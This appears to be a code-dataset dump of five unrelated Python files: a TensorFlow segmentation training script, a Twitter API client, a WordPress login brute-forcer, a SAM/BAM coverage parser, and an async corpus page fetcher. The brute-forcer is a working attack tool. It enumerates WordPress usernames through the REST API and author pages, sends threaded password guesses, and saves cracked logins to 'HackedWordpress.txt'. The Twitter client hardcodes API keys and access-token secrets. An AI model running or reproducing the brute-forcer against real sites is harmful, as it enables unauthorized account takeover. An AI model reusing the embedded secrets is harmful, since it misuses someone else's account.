net=slim.conv2d(net,64,[3,3],rate=2,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv2')
net=slim.conv2d(net,64,[3,3],rate=4,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv3')
net=slim.conv2d(net,64,[3,3],rate=8,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv4')
net=slim.conv2d(net,64,[3,3],rate=16,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv5')
net=slim.conv2d(net,64,[3,3],rate=32,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv6')
net=slim.conv2d(net,64,[3,3],rate=64,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv7')
net=slim.conv2d(net,64,[3,3],rate=128,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv8')
net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv9')
net=slim.conv2d(net,6,[1,1],rate=1,activation_fn=None,scope='g_conv_last')
return tf.tanh(net)
def prepare_data():
train_im_names = [line.rstrip() for line in open('./train.txt')]
val_im_names = [line.rstrip() for line in open('./val.txt')]
return train_im_names,val_im_names
config=tf.ConfigProto()
config.gpu_options.allow_growth=True
sess=tf.Session(config=config)
im_path = "./img"
seg_path = "./inst"
train_im_names,val_im_names = prepare_data()
input=tf.placeholder(tf.float32,shape=[None,None,None,7])
output=tf.placeholder(tf.float32,shape=[None,None,None,1])
sz=tf.placeholder(tf.int32,shape=[2])
input_vgg=tf.placeholder(tf.float32,shape=[None,None,None,3])
network=build(input,sz)
vgg19_network=build_vgg19(input_vgg)
# L2 Loss
loss_d1=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss_d2=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss_d3=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss_d4=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss_d5=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss_d6=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss = tf.reduce_min([loss_d1, loss_d2, loss_d3, loss_d4, loss_d5, loss_d6]) + 0.0025*(32*loss_d1+16*loss_d2+8*loss_d3+4*loss_d4+2*loss_d5+1*loss_d6)
# L1 Loss
loss2_d1=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss2_d2=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss2_d3=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss2_d4=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss2_d5=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss2_d6=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss2 = tf.reduce_min([loss2_d1, loss2_d2, loss2_d3, loss2_d4, loss2_d5, loss2_d6]) + 0.0025*(32*loss2_d1+16*loss2_d2+8*loss2_d3+4*loss2_d4+2*loss2_d5+1*loss2_d6)
# IoU Loss
nw1 = tf.expand_dims(network[:,:,:,0],axis=3)
nw2 = tf.expand_dims(network[:,:,:,1],axis=3)
nw3 = tf.expand_dims(network[:,:,:,2],axis=3)
nw4 = tf.expand_dims(network[:,:,:,3],axis=3)
nw5 = tf.expand_dims(network[:,:,:,4],axis=3)
nw6 = tf.expand_dims(network[:,:,:,5],axis=3)
iou_d1 = 1-tf.reduce_mean(tf.multiply(nw1,output))/(tf.reduce_mean(tf.maximum(nw1,output))+1e-6)
iou_d2 = 1-tf.reduce_mean(tf.multiply(nw2,output))/(tf.reduce_mean(tf.maximum(nw2,output))+1e-6)
iou_d3 = 1-tf.reduce_mean(tf.multiply(nw3,output))/(tf.reduce_mean(tf.maximum(nw3,output))+1e-6)
iou_d4 = 1-tf.reduce_mean(tf.multiply(nw4,output))/(tf.reduce_mean(tf.maximum(nw4,output))+1e-6)
iou_d5 = 1-tf.reduce_mean(tf.multiply(nw5,output))/(tf.reduce_mean(tf.maximum(nw5,output))+1e-6)
iou_d6 = 1-tf.reduce_mean(tf.multiply(nw6,output))/(tf.reduce_mean(tf.maximum(nw6,output))+1e-6)
loss_iou = tf.reduce_min([iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6]) + 0.0025*(32*iou_d1+16*iou_d2+8*iou_d3+4*iou_d4+2*iou_d5+1*iou_d6)
# add positive/negative clicks as soft constraints
ct_mask = tf.cast(input[:,:,:,3],dtype=tf.bool) & tf.cast(input[:,:,:,4],dtype=tf.bool)
ct_mask = tf.tile(tf.expand_dims(~ct_mask,axis=3), [1,1,1,6])
ct_mask = tf.cast(ct_mask, dtype=tf.float32)
ct_mask /= tf.reduce_mean(ct_mask)
output_tile = tf.tile(output,[1,1,1,6])
ct_loss = tf.reduce_mean(tf.abs(network - output_tile) * ct_mask)
all_loss = loss_iou + ct_loss
opt=tf.train.AdamOptimizer(learning_rate=0.0001).minimize(all_loss,var_list=[var for var in tf.trainable_variables() if var.name.startswith('g_')])
saver=tf.train.Saver(max_to_keep=1000)
sess.run(tf.initialize_all_variables())
ckpt=tf.train.get_checkpoint_state("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh")
if ckpt:
print('loaded '+ckpt.model_checkpoint_path)
saver.restore(sess,ckpt.model_checkpoint_path)
input_images=[None]*len(train_im_names)
output_masks=[None]*len(train_im_names)
# For displaying the losses
all=np.zeros(30000,dtype=float)
all2=np.zeros(30000,dtype=float)
all_iou=np.zeros(30000,dtype=float)
all_d1=np.zeros(30000,dtype=float)
all_d2=np.zeros(30000,dtype=float)
all_d3=np.zeros(30000,dtype=float)
all_d4=np.zeros(30000,dtype=float)
all_d5=np.zeros(30000,dtype=float)
all_d6=np.zeros(30000,dtype=float)
for epoch in range(1,101):
if os.path.isdir("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch):
continue
cnt=0
for id in np.random.permutation(len(train_im_names)):
# for id in np.random.permutation(1):
if input_images[id] is None:
# The input image
input_images[id] = cv2.imread(im_path + "/" + train_im_names[id]+".jpg",-1)
if output_masks[id] is None:
# The SBD Groundtruth mask
mat_contents = sio.loadmat(seg_path + "/" + train_im_names[id] + ".mat")
tmpstr = mat_contents['GTinst']
tmpmat = tmpstr[0,0]
output_masks[id] = tmpmat['Segmentation']
output_mask = deepcopy(output_masks[id])
output_mask[output_mask==255] = 0
num_obj = output_mask.max()
for obj_id in range(num_obj):
st = time.time()
# random clicks
input_pos = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_pos.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
input_neg = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_neg.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
input_pos_clks = deepcopy(input_pos)
input_neg_clks = deepcopy(input_neg)
input_pos_clks[input_pos != 0] = 255
input_neg_clks[input_neg != 0] = 255
if np.sum(input_pos==0)==0:
continue
input_image=np.expand_dims(np.float32(np.concatenate(
[input_images[id], np.expand_dims(input_pos,axis=2), np.expand_dims(input_neg,axis=2),
np.expand_dims(input_pos_clks,axis=2), np.expand_dims(input_neg_clks,axis=2)], axis=2)),axis=0)
_,iH,iW,_=input_image.shape
output_image = deepcopy(output_mask)
output_image[output_mask != (obj_id+1)] = 0
output_image[output_mask == (obj_id+1)] = 255
output_image=np.expand_dims(np.expand_dims(np.float32(output_image),axis=0),axis=3)/255.0
_,current,current2,current3,d1,d2,d3,d4,d5,d6=sess.run([opt,loss,loss2,loss_iou, iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6],feed_dict={input:input_image,sz:[iH,iW],output:output_image})
all[cnt]=current*255.0*255.0 #squared in 255 range (remember the network takes [0,1]
all2[cnt]=current2*255.0 #changed to 255 in error
all_iou[cnt]=current3
all_d1[cnt]=d1
all_d2[cnt]=d2
all_d3[cnt]=d3
all_d4[cnt]=d4
all_d5[cnt]=d5
all_d6[cnt]=d6
cnt+=1
print("%d %d l2: %.4f l1: %.4f IoU: %.4f d1-6: %.4f %.4f %.4f %.4f %.4f %.4f time: %.4f %s"%(epoch,cnt,np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)]),np.mean(all_d1[np.where(all_d1)]),
np.mean(all_d2[np.where(all_d2)]),np.mean(all_d3[np.where(all_d3)]),np.mean(all_d4[np.where(all_d4)]), np.mean(all_d5[np.where(all_d5)]), np.mean(all_d6[np.where(all_d6)]),
time.time()-st,os.getcwd().split('/')[-2]))
os.makedirs("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch)
target=open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/score.txt"%epoch,'w')
target.write("%f\n%f\n%f"%(np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)])))
target.close()
saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/model.ckpt")
saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/model.ckpt"%epoch)
# validation
all_test = np.zeros(100, dtype=float)
all2_test = np.zeros(100, dtype=float)
all_iou_test = np.zeros(100, dtype=float)
target = open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/test_score.txt" % epoch, 'w')
for id in range(100):
input_image = cv2.imread(im_path + "/" + val_im_names[id] + ".jpg", -1)
input_pos = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_pos.png" % (1, 1), -1)
input_neg = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_neg.png" % (1, 1), -1)
input_pos_clks = deepcopy(input_pos)
input_neg_clks = deepcopy(input_neg)
input_pos_clks[input_pos != 0] = 255
input_neg_clks[input_neg != 0] = 255
output_gt = cv2.imread("./val" + "/" + val_im_names[id] + "/objs/%05d.png" % 1, -1)
output_gt = np.expand_dims(np.expand_dims(np.float32(output_gt), axis=0), axis=3) / 255.0
iH, iW, _ = input_image.shape
input_image = np.expand_dims(np.float32(np.concatenate(
[input_image, np.expand_dims(input_pos, axis=2), np.expand_dims(input_neg, axis=2),
np.expand_dims(input_pos_clks, axis=2), np.expand_dims(input_neg_clks, axis=2)], axis=2)), axis=0)
st=time.time()
output_image, loss_test, loss2_test, iou_test = sess.run([network, loss, loss2, loss_iou],feed_dict={input:input_image,sz:[iH,iW],output: output_gt})
all_test[id] = loss_test * 255.0 * 255.0
all2_test[id] = loss2_test * 255
all_iou_test[id] = iou_test
target.write("%f %f %f\n" % (all_test[id], all2_test[id], all_iou_test[id]))
print("%.3f"%(time.time()-st))
output_image = np.minimum(np.maximum(output_image, 0.0), 1.0)
for output_d in range(6):
save_image = input_image[0, :, :, 0:3] / 255.0
save_image[:, :, 0] = (save_image[:, :, 0] + 0.5 * output_image[0, :, :, output_d])
save_image[:, :, 1] = (save_image[:, :, 1] + 0.5 * output_image[0, :, :, output_d])
save_image[:, :, 2] = (save_image[:, :, 2] + 0.5 * output_image[0, :, :, output_d])
save_image = np.minimum(np.maximum(save_image, 0.0), 1.0) * 255.0
cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d_BW.png" % (epoch, val_im_names[id], output_d),
np.uint8(output_image[0, :, :, output_d] * 255.0))
cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d.jpg" % (epoch, val_im_names[id], output_d),
np.uint8(save_image))
target.write("Mean: %f %f %f\n" % (np.mean(all_test[np.where(all_test)]), np.mean(all2_test[np.where(all2_test)]), np.mean(all_iou_test[np.where(all_iou_test)])))
target.close()
|
python
|
import tweepy
from tweepy.parsers import JSONParser
# This class creates an instance of the Twitter API
class API(object):
# Initiates the API
def __init__(self):
# Keys for Twitter API (maybe reading it from a .txt)
self.consumer_key = 'EfbgNEMgmXNSweNDcWmoaSwm0'
self.consumer_secret = 'u3HlNeQNhG4whVzbilCxvswfJTMLG4ppxisaqtB4exHvGgDxsc'
self.access_token_key = '3940337423-CC2NFNG4zX9t3Z4Hl5vAbseYmlhlz6CXbuDlQNr'
self.access_token_secret = 'tmK2f3ZPrOWSkqY2bzu9St0LqDzJVIp5IV8PWPwENh69z'
self.auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
self.auth.set_access_token(self.access_token_key, self.access_token_secret)
self.api = tweepy.API(self.auth, parser = JSONParser())
# From a list of user_names, it returns the corresponding User entities
def get_users(self, user_names):
users = []
for user in user_names:
users.append(self.api.get_user(user))
return users
# Returns all the tweets in the timeline of a particular user
def read_tweets(self, user_id):
newest_id = 1 # The id of the newest tweet read (always greater than the oldest)
oldest_id = 0 # The id of the oldest tweet read (always lower than the oldest)
# While we are receiving new tweets
while newest_id -oldest_id > 0:
tweets = []
try:
# First option: This is the first time we read tweets
if oldest_id == 0:
tweets = self.api.user_timeline(id = user_id, count = 200) # Take 200 tweets
newest_id = tweets[0]['id'] # Update the newest id
oldest_id = tweets[len(tweets)-1]['id'] # Update the oldest id
# Second option: This is not the first time we read tweets
else:
new_tweets = self.api.user_timeline(id = user_id, count = 200,
max_id = oldest_id) # Take 200 tweets previous to the oldest tweet
tweets.extend(new_tweets) # Append the new tweets to the list
newest_id = new_tweets[0]['id'] # Update the newest id
oldest_id = new_tweets[len(new_tweets)-1]['id'] # Update the oldest id
except tweepy.error.RateLimitError:
limit = len(tweets)
msg = "Rate limit reached after reading %d tweets." % (limit)
raise tweepy.error.RateLimitError(msg)
return tweets
def rate_limit_status(self):
return self.api.rate_limit_status()['resources']['account']['/account/settings']['limit']
|
python
|
# coding=utf-8
import threading, time, re, os, sys, json, random
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
'''
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
'''
class mulai(object):
def __init__(self):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.cls()
self.print_logo()
site = raw_input(self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' Target: ' + self.c)
if site.startswith('http://'):
site = site.replace('http://', '')
elif site.startswith('https://'):
site = site.replace('https://', '')
else:
pass
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' START BruteForce Process: ' \
+ self.c + site
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
source = requests.get('http://' + site + '/wp-login.php', timeout=5, headers=agent).text.encode('utf-8')
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get Wp-login.php SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [ URL Not valid or Timeout! or Your Ip Address Blocked! ]'
sys.exit()
try:
WpSubmitValue = re.findall('class="button button-primary button-large" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
try:
WpRedirctTo = re.findall('name="redirect_to" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
if 'Log In' in WpSubmitValue:
WpSubmitValue = 'Log+In'
else:
WpSubmitValue = WpSubmitValue
usgen = self.UserName_Enumeration(site)
if usgen != None:
Username = usgen
time.sleep(1)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Enumeration Username: ' + self.g + str(Username) + self.g + ' [OK]'
else:
try:
Username = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w +
' Username for Start bf: ')
if Username == '':
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
try:
password = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w + ' input Password list: ')
with open(password, 'r') as xx:
passfile = xx.read().splitlines()
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.g + \
str(len(passfile)) + self.c + ' Passwords Loaded!'
time.sleep(2)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Password list] ' + self.r + ' [NO]'
sys.exit()
thread = []
for passwd in passfile:
t = threading.Thread(target=self.BruteForce, args=(site, passwd, WpSubmitValue, WpRedirctTo, Username))
if self.flag == 1:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'wordpress' + self.c + ' [Not Vuln]'
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
os.system("figlet wp-brute | lolcat")
x = """
r00t@star
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
example : http://site
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def UserName_Enumeration(self, site):
_cun = 1
Flag = True
__Check2 = requests.get('http://' + site + '/?author=1', timeout=10)
try:
while Flag:
GG = requests.get('http://' + site + '/wp-json/wp/v2/users/' + str(_cun), timeout=5)
__InFo = json.loads(GG.text)
if 'id' not in __InFo:
Flag = False
else:
Usernamez = __InFo['slug']
return str(Usernamez).encode('utf-8')
break
except:
try:
if '/author/' not in __Check2.text:
return None
else:
find = re.findall('/author/(.*)/"', __Check2.text)
username = find[0]
if '/feed' in username:
find = re.findall('/author/(.*)/feed/"', __Check2.text)
username2 = find[0]
return username2.encode('utf-8')
else:
return username.encode('utf-8')
except requests.exceptions.ReadTimeout:
return None
def BruteForce(self, site, passwd, WpSubmitValue, WpRedirctTo, Username):
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['log'] = Username
post['pwd'] = passwd
post['wp-submit'] = WpSubmitValue
post['redirect_to'] = WpRedirctTo
post['testcookie'] = 1
url = "http://" + site + '/wp-login.php'
GoT = requests.post(url, data=post, headers=agent, timeout=10)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Testing: ' + self.y + passwd
if 'wordpress_logged_in_' in str(GoT.cookies):
print self.c + ' [' + self.y + '+' + self.c + '] ' + \
self.y + site + ' ' + self.y + 'username: ' + self.g \
+ Username + self.y + ' Password: ' + self.g + passwd
with open('HackedWordpress.txt', 'a') as writer:
writer.write('http://' + site + '/wp-login.php' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
mulai()
|
python
|
"""
methods for processing mapping results in SAM/BAM format
def parse_deltas(sam_file, ...):
parse a sam/bam file into dicts of coverage changes by position
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
convert coverage deltas into coverage array
class SAMFlag(IntFlag):
class for decomposing SAM flags into bits for easier understanding
"""
import numpy
import subprocess
import enum
from collections import defaultdict
from edl import blastm8
import logging
SAMTOOLS_CMD_TEMPLATE = """samtools view -F 2308 {sam_file}"""
def parse_deltas_from_sam(sam_file, samtools_cmd_template=SAMTOOLS_CMD_TEMPLATE, **kwargs):
"""
Parse a SAM file into a collection of coverage deltas by reference sequences
by default it uses samtools to strip all but the primary alignments first
then hits are parsed with any kwargs sent to blastm8.FilterParams()
"""
samtools_cmd = samtools_cmd_template.format(sam_file=sam_file)
with subprocess.Popen(samtools_cmd, shell=True, stdout=subprocess.PIPE,) as process:
string_lines = (l.decode() for l in iter(process.stdout))
return parse_deltas(string_lines, format=blastm8.SAM, **kwargs)
def parse_deltas(hit_table, portion=False, zero_indexed=False, **kwargs):
""" parses hit table into coverage deltas.
kwargs passed blastm8.generate_hits()"""
# dict of dicts of counts
deltas_by_ref = defaultdict(lambda: defaultdict(int))
read_count, hit_count = 0, 0
for read, hits in blastm8.generate_hits(
hit_table, **kwargs
):
read_count += 1
factor = 1 / len(hits) if portion else 1
for hit in hits:
hit_count += 1
start, end = sorted((hit.hstart, hit.hend))
if zero_indexed:
start, end = start+1, end+1
deltas = deltas_by_ref[hit.hit]
deltas[start] += factor
deltas[end + 1] -= factor
logging.debug(
"parsed deltas for %d contigs from %d reads and %d hits",
len(deltas_by_ref),
read_count,
hit_count,
)
return deltas_by_ref
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
""" converts dict of coverage deltas into array of coverage values
cov_deltas: {pos: cov_change, ...}
x_max: length of reference sequence (otherwise use last delta position)
zero: replace 0 coverage with NAN so plots are discontinuous
"""
zero = numpy.NAN if nan_for_zero else 0
sorted_keys = sorted(cov_deltas)
cov_segments = []
last_pos = 1
current_coverage = 0
for pos in sorted_keys:
delta = cov_deltas[pos]
cov_segments.append(
numpy.full(
pos - last_pos, current_coverage if current_coverage != 0 else zero
)
)
current_coverage += delta
last_pos = pos
cov_segments.append(
numpy.full(
1 if x_max is None else x_max + 1 - last_pos,
current_coverage if current_coverage != 0 else zero,
)
)
return numpy.concatenate(cov_segments)
class SAMFlag(enum.IntFlag):
"""
From Wikipedia SAM Format entry:
(int) (binary) (meaning)
1 000000000001 template having multiple templates in sequencing (read is paired)
2 000000000010 each segment properly aligned according to the aligner (read mapped in proper pair)
4 000000000100 segment unmapped (read1 unmapped)
8 000000001000 next segment in the template unmapped (read2 unmapped)
16 000000010000 SEQ being reverse complemented (read1 reverse complemented)
32 000000100000 SEQ of the next segment in the template being reverse complemented (read2 reverse complemented)
64 000001000000 the first segment in the template (is read1)
128 000010000000 the last segment in the template (is read2)
256 000100000000 not primary alignment
512 001000000000 alignment fails quality checks
1024 010000000000 PCR or optical duplicate
2048 100000000000 supplementary alignment (e.g. aligner specific, could be a portion of a split read or a tied region)
"""
PAIRED = 1
PROPER_PAIR = 2
UNMAPPED = 4
NEXT_UNMAPPED = 8
REV_COMP = 16
NEXT_REV_COMP = 32
READ_1 = 64
READ_2 = 128
NON_PRIMARY = 256
LOW_Q = 512
DUPLICATE = 1024
SUPPLEMENTAL = 2048
|
python
|
"""
Module for requesting to URL and get page's html code from there,
download media files, check that the request if correct, page in RNC exists.
"""
__all__ = (
'get_htmls', 'is_request_correct', 'download_docs'
)
import asyncio
import logging
import time
from typing import List, Optional, Tuple, Union
import aiofiles
import aiohttp
import bs4
logger = logging.getLogger("rnc")
WAIT = 24
class BaseRequestError(Exception):
pass
class NoResultFound(BaseRequestError):
pass
class LastPageDoesntExist(BaseRequestError):
pass
class WrongHTTPRequest(BaseRequestError):
pass
async def fetch_html(url: str, # type: ignore
ses: aiohttp.ClientSession,
**kwargs) -> Optional[Union[Tuple[int, str], int]]:
""" Coro, obtaining page's HTML code.
This coro should be awaited from a worker.
:return: tuple of int and str, page index and its HTML code.
None if there's an error, -1 if it's 429 and the worker should
wait some time and make request again.
:exception: all exceptions should be processed here.
"""
worker_name = kwargs.pop('worker_name', '')
try:
resp = await ses.get(url, params=kwargs)
except Exception as e:
logger.error(
f"{e}\n{worker_name}Cannot get "
f"answer from '{url}' with {kwargs}")
return # type: ignore
if resp.status == 200:
text = await resp.text('utf-8')
resp.close()
return kwargs['p'], text
elif resp.status == 429:
resp.close()
return -1
logger.error(
f"{worker_name}{resp.status} -- '{resp.reason}' "
f"requesting to {resp.url}"
)
resp.close()
async def worker_fetching_html(worker_name: str,
q_args: asyncio.Queue,
q_results: asyncio.Queue) -> None:
"""
Worker requesting to URL with args from
q_args and putting results to q_results.
Wait some time and request again if there's 429 error.
"""
while True:
url, ses, kwargs = q_args.get_nowait()
logger.debug(
f"{worker_name}Requested to '{url}' with '{kwargs}'")
res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
if res is None:
q_args.task_done()
return
while res == -1:
logger.debug(
f"{worker_name}429 'Too many requests', "
f"page: {kwargs['p']}; wait {WAIT}s"
)
await asyncio.sleep(WAIT)
res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
logger.debug(
f"{worker_name}Received from '{url}' with '{kwargs}'")
q_args.task_done()
await q_results.put((res[0], res[1])) # type: ignore
async def get_htmls_coro(url: str,
start: int,
stop: int,
**kwargs) -> List[str]:
"""
Coro running 5 workers doing requests and
getting HTML codes of the pages.
URLs will be created for i in range(start, stop),
HTTP tag 'p' (page) is i.
"""
timeout = aiohttp.ClientTimeout(WAIT)
q_results = asyncio.Queue(maxsize=-1) # type: ignore
q_args = asyncio.Queue(maxsize=-1) # type: ignore
async with aiohttp.ClientSession(timeout=timeout) as ses:
for p_index in range(start, stop):
await q_args.put((url, ses, {**kwargs, 'p': p_index}))
tasks = []
for worker_index in range(5):
name = f"Worker-{worker_index + 1}: "
task = asyncio.create_task(
worker_fetching_html(name, q_args, q_results)
)
tasks += [task]
await q_args.join()
for task in tasks:
task.cancel()
results = [
q_results.get_nowait()
for _ in range(q_results.qsize())
]
results.sort(key=lambda res: res[0])
return [
html for _, html in results
]
def get_htmls(url: str,
start: int = 0,
stop: int = 1,
**kwargs) -> List[str]:
""" Run coro, get html codes of the pages."""
logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
coro_start = time.time()
html_codes = asyncio.run(
get_htmls_coro(url, start, stop, **kwargs)
)
logger.info("Request was successfully completed")
logger.info(f"Coro executing time: {round(time.time() - coro_start, 2)}")
return html_codes
async def get_htmls_async(url: str,
start: int = 0,
stop: int = 1,
**kwargs) -> List[str]:
""" Run coro, get html codes of the pages."""
logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
coro_start = time.time()
html_codes = await get_htmls_coro(url, start, stop, **kwargs)
logger.info("Request was successfully completed")
logger.info(f"Coro executing time: {round(time.time() - coro_start, 2)}")
return html_codes
def whether_result_found(url: str,
**kwargs) -> str:
"""
Whether the page contains results.
:return: first page HTML code if everything is OK.
:exception RuntimeError: if HTTP request was wrong.
:exception ValueError: if the result not found.
"""
logger.debug("Validating that the request is OK")
try:
page_html = get_htmls(url, **kwargs)[0]
except Exception:
logger.error(f"The request is not correct: {kwargs}")
raise RuntimeError
logger.debug("The request is correct")
logger.debug("Validating that the result exits")
soup = bs4.BeautifulSoup(page_html, 'lxml')
# TODO: сузить круг поиска
content = soup.find('div', {'class': 'content'}).text
res_msg = ('По этому запросу ничего не найдено.' in content or
'No results match the search query.' in content)
if res_msg:
raise ValueError
return page_html
def does_page_exist(url: str,
p_index: int,
first_page: str,
**kwargs) -> str:
"""
Whether a page at the index exists.
It means, the number of the page in 'pager' is equal to expected index.
RNC redirects to the first page if the page at the number doesn't exist.
Here it's assumed, that the request's correct.
:return: last page code if everything is OK.
:exception ValueError: the page doesn't exist.
"""
# indexing starts with 0
start = p_index
start = start * (start >= 0)
stop = p_index + 1
# request's correct → first page exists
if stop == 1:
return first_page
last_page = get_htmls(url, start, stop, **kwargs)[0]
soup = bs4.BeautifulSoup(last_page, 'lxml')
pager = soup.find('p', {'class': 'pager'})
if pager:
max_page_number = max(
int(page.text)
for page in pager.find_all('a')
if page.text.isdigit()
)
if not max_page_number:
raise ValueError
if max_page_number < stop:
raise ValueError
return last_page
# if there's no pager, but result exists.
# this might happen if expand=full or out=kwic
if last_page == first_page:
raise ValueError
return last_page
def is_request_correct(url: str,
p_count: int,
**kwargs) -> Tuple[str, str]:
"""
Check:
– is the HTTP request correct (means there are no exceptions catch).
– has there been any result.
– does a page at the number exist (
means RNC doesn't redirect to the first page).
:return: first and last pages if everything's OK.
:exception WrongHTTPRequest: HTTP request is wrong.
:exception NoResultFound: no result found.
:exception LastPageDoesntExist: the last page doesn't exist.
"""
logger.debug("Validating that everything is OK")
try:
# to reduce the number of requests
# the two checks are combined into one.
# coro writes logs by itself
first_page = whether_result_found(url, **kwargs)
except ValueError:
logger.error("HTTP request is OK, but no result found")
raise NoResultFound(f"{kwargs}")
except RuntimeError:
logger.error("HTTP request is wrong")
raise WrongHTTPRequest(f"{kwargs}")
logger.debug("HTTP request is correct, result found")
logger.debug("Validating that the last page exists")
try:
last_page = does_page_exist(url, p_count - 1, first_page, **kwargs)
except ValueError:
logger.error("Everything is OK, but last page doesn't exist")
raise LastPageDoesntExist(f"{kwargs}")
logger.debug("The last page exists")
logger.debug("Validated successfully")
return first_page, last_page
